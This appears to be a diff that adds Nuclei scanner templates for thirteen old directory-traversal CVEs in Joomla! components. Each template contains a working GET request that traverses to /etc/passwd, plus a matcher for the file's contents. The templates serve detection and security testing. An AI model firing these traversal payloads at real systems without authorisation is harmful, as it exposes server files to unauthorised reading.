Nuclei 8.6.6

CVE-2007-4504.yaml

@@ -0,0 +1,27 @@
+id: CVE-2007-4504
+
+info:
+  name: Joomla! Component RSfiles 1.0.2 - 'path' File Download
+  author: daffainfo
+  severity: high
+  description: Directory traversal vulnerability in index.php in the RSfiles component (com_rsfiles) 1.0.2 and earlier for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the path parameter in a files.display action.
+  reference:
+    - https://www.exploit-db.com/exploits/4307
+    - https://www.cvedetails.com/cve/CVE-2007-4504
+  tags: cve,cve2007,joomla,lfi
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/index.php?option=com_rsfiles&task=files.display&path=../../../../../../../../../etc/passwd"
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        regex:
+          - "root:.*:0:0"
+
+      - type: status
+        status:
+          - 200

CVE-2008-6080.yaml

@@ -0,0 +1,27 @@
+id: CVE-2008-6080
+
+info:
+  name: Joomla! Component ionFiles 4.4.2 - File Disclosure
+  author: daffainfo
+  severity: high
+  description: Directory traversal vulnerability in download.php in the ionFiles (com_ionfiles) 4.4.2 component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
+  reference:
+    - https://www.exploit-db.com/exploits/6809
+    - https://www.cvedetails.com/cve/CVE-2008-6080
+  tags: cve,cve2008,joomla,lfi
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/components/com_ionfiles/download.php?file=../../../../../../../../etc/passwd&download=1"
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        regex:
+          - "root:.*:0:0"
+
+      - type: status
+        status:
+          - 200

CVE-2008-6222.yaml

@@ -0,0 +1,27 @@
+id: CVE-2008-6222
+
+info:
+  name: Joomla! Component ProDesk 1.0/1.2 - Local File Inclusion
+  author: daffainfo
+  severity: high
+  description: Directory traversal vulnerability in the Pro Desk Support Center (com_pro_desk) component 1.0 and 1.2 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the include_file parameter to index.php.
+  reference:
+    - https://www.exploit-db.com/exploits/6980
+    - https://www.cvedetails.com/cve/CVE-2008-6222
+  tags: cve,cve2008,joomla,lfi
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/index.php?option=com_pro_desk&include_file=../../../../../../etc/passwd"
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        regex:
+          - "root:.*:0:0"
+
+      - type: status
+        status:
+          - 200

CVE-2009-1496.yaml

@@ -0,0 +1,27 @@
+id: CVE-2009-1496
+
+info:
+  name: Joomla! Component Cmimarketplace - 'viewit' Directory Traversal
+  author: daffainfo
+  severity: high
+  description: Directory traversal vulnerability in the Cmi Marketplace (com_cmimarketplace) component 0.1 for Joomla! allows remote attackers to list arbitrary directories via a .. (dot dot) in the viewit parameter to index.php.
+  reference:
+    - https://www.exploit-db.com/exploits/8367
+    - https://www.cvedetails.com/cve/CVE-2009-1496
+  tags: cve,cve2009,joomla,lfi
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/index.php?option=com_cmimarketplace&Itemid=70&viewit=/../../../../../../etc/passwd&cid=1"
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        regex:
+          - "root:.*:0:0"
+
+      - type: status
+        status:
+          - 200

CVE-2009-2015.yaml

@@ -0,0 +1,27 @@
+id: CVE-2009-2015
+
+info:
+  name: Joomla! Component MooFAQ (com_moofaq) - Local File Inclusion
+  author: daffainfo
+  severity: high
+  description: Directory traversal vulnerability in includes/file_includer.php in the Ideal MooFAQ (com_moofaq) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
+  reference:
+    - https://www.exploit-db.com/exploits/8898
+    - https://www.cvedetails.com/cve/CVE-2009-2015
+  tags: cve,cve2009,joomla,lfi
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/components/com_moofaq/includes/file_includer.php?gzip=0&file=/../../../../../etc/passwd"
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        regex:
+          - "root:.*:0:0"
+
+      - type: status
+        status:
+          - 200

CVE-2009-2100.yaml

@@ -0,0 +1,27 @@
+id: CVE-2009-2100
+
+info:
+  name: Joomla! Component com_Projectfork 2.0.10 - Local File Inclusion
+  author: daffainfo
+  severity: high
+  description: Directory traversal vulnerability in the JoomlaPraise Projectfork (com_projectfork) component 2.0.10 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the section parameter to index.php.
+  reference:
+    - https://www.exploit-db.com/exploits/8946
+    - https://www.cvedetails.com/cve/CVE-2009-2100
+  tags: cve,cve2009,joomla,lfi
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/index.php?option=com_projectfork&section=../../../../../../../../etc/passwd"
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        regex:
+          - "root:.*:0:0"
+
+      - type: status
+        status:
+          - 200

CVE-2009-3053.yaml

@@ -0,0 +1,27 @@
+id: CVE-2009-3053
+
+info:
+  name: Joomla! Component Agora 3.0.0b (com_agora) - Local File Inclusion
+  author: daffainfo
+  severity: high
+  description: Directory traversal vulnerability in the Agora (com_agora) component 3.0.0b for Joomla! allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the action parameter to the avatars page, reachable through index.php.
+  reference:
+    - https://www.exploit-db.com/exploits/9564
+    - https://www.cvedetails.com/cve/CVE-2009-3053
+  tags: cve,cve2009,joomla,lfi
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../etc/passwd"
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        regex:
+          - "root:.*:0:0"
+
+      - type: status
+        status:
+          - 200

CVE-2009-3318.yaml

@@ -0,0 +1,27 @@
+id: CVE-2009-3318
+
+info:
+  name: Joomla! Component com_album 1.14 - Directory Traversal
+  author: daffainfo
+  severity: high
+  description: Directory traversal vulnerability in the Roland Breedveld Album (com_album) component 1.14 for Joomla! allows remote attackers to access arbitrary directories and have unspecified other impact via a .. (dot dot) in the target parameter to index.php.
+  reference:
+    - https://www.exploit-db.com/exploits/9706
+    - https://www.cvedetails.com/cve/CVE-2009-3318
+  tags: cve,cve2009,joomla,lfi
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/index.php?option=com_album&Itemid=128&target=../../../../../../../../../etc/passwd"
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        regex:
+          - "root:.*:0:0"
+
+      - type: status
+        status:
+          - 200

CVE-2009-4202.yaml

@@ -0,0 +1,27 @@
+id: CVE-2009-4202
+
+info:
+  name: Joomla! Component Omilen Photo Gallery 0.5b - Local File Inclusion
+  author: daffainfo
+  severity: high
+  description: Directory traversal vulnerability in the Omilen Photo Gallery (com_omphotogallery) component Beta 0.5 for Joomla! allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the controller parameter to index.php.
+  reference:
+    - https://www.exploit-db.com/exploits/8870
+    - https://www.cvedetails.com/cve/CVE-2009-4202
+  tags: cve,cve2009,joomla,lfi
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/index.php?option=com_omphotogallery&controller=../../../../../../../../../etc/passwd"
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        regex:
+          - "root:.*:0:0"
+
+      - type: status
+        status:
+          - 200

CVE-2009-4679.yaml

@@ -0,0 +1,27 @@
+id: CVE-2009-4679
+
+info:
+  name: Joomla! Component iF Portfolio Nexus - 'Controller' Remote File Inclusion
+  author: daffainfo
+  severity: high
+  description: Directory traversal vulnerability in the inertialFATE iF Portfolio Nexus (com_if_nexus) component 1.5 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
+  reference: |
+    - https://www.exploit-db.com/exploits/33440
+    - https://www.cvedetails.com/cve/CVE-2009-4679
+  tags: cve,cve2009,joomla,lfi
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/index.php?option=com_kif_nexus&controller=../../../../../../../../../etc/passwd"
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        regex:
+          - "root:.*:0:0"
+
+      - type: status
+        status:
+          - 200

CVE-2010-0157.yaml

@@ -0,0 +1,27 @@
+id: CVE-2010-0157
+
+info:
+  name: Joomla! Component com_biblestudy - Local File Inclusion
+  author: daffainfo
+  severity: high
+  description: Directory traversal vulnerability in the Bible Study (com_biblestudy) component 6.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter in a studieslist action to index.php.
+  reference:
+    - https://www.exploit-db.com/exploits/10943
+    - https://www.cvedetails.com/cve/CVE-2010-0157
+  tags: cve,cve2010,joomla,lfi
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../etc/passwd"
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        regex:
+          - "root:.*:0:0"
+
+      - type: status
+        status:
+          - 200

CVE-2010-0467.yaml

@@ -0,0 +1,32 @@
+id: CVE-2010-0467
+
+info:
+  name: Joomla! Component CCNewsLetter - Local File Inclusion
+  author: daffainfo
+  severity: medium
+  description: Directory traversal vulnerability in the ccNewsletter (com_ccnewsletter) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a ccnewsletter action to index.php.
+  reference: |
+    - https://www.exploit-db.com/exploits/11282
+    - https://www.cvedetails.com/cve/CVE-2010-0467
+  tags: cve,cve2010,joomla,lfi
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
+    cvss-score: 5.80
+    cve-id: CVE-2010-0467
+    cwe-id: CWE-22
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../etc/passwd%00"
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        regex:
+          - "root:.*:0:0"
+
+      - type: status
+        status:
+          - 200

CVE-2010-0696.yaml

@@ -0,0 +1,27 @@
+id: CVE-2010-0696
+
+info:
+  name: Joomla! Component Jw_allVideos - Arbitrary File Download
+  author: daffainfo
+  severity: high
+  description: Directory traversal vulnerability in includes/download.php in the JoomlaWorks AllVideos (Jw_allVideos) plugin 3.0 through 3.2 for Joomla! allows remote attackers to read arbitrary files via a ./../.../ (modified dot dot) in the file parameter.
+  reference:
+    - https://www.exploit-db.com/exploits/11447
+    - https://www.cvedetails.com/cve/CVE-2010-0696
+  tags: cve,cve2010,joomla,lfi
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/plugins/content/jw_allvideos/includes/download.php?file=../../../../../../../../etc/passwd"
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        regex:
+          - "root:.*:0:0"
+
+      - type: status
+        status:
+          - 200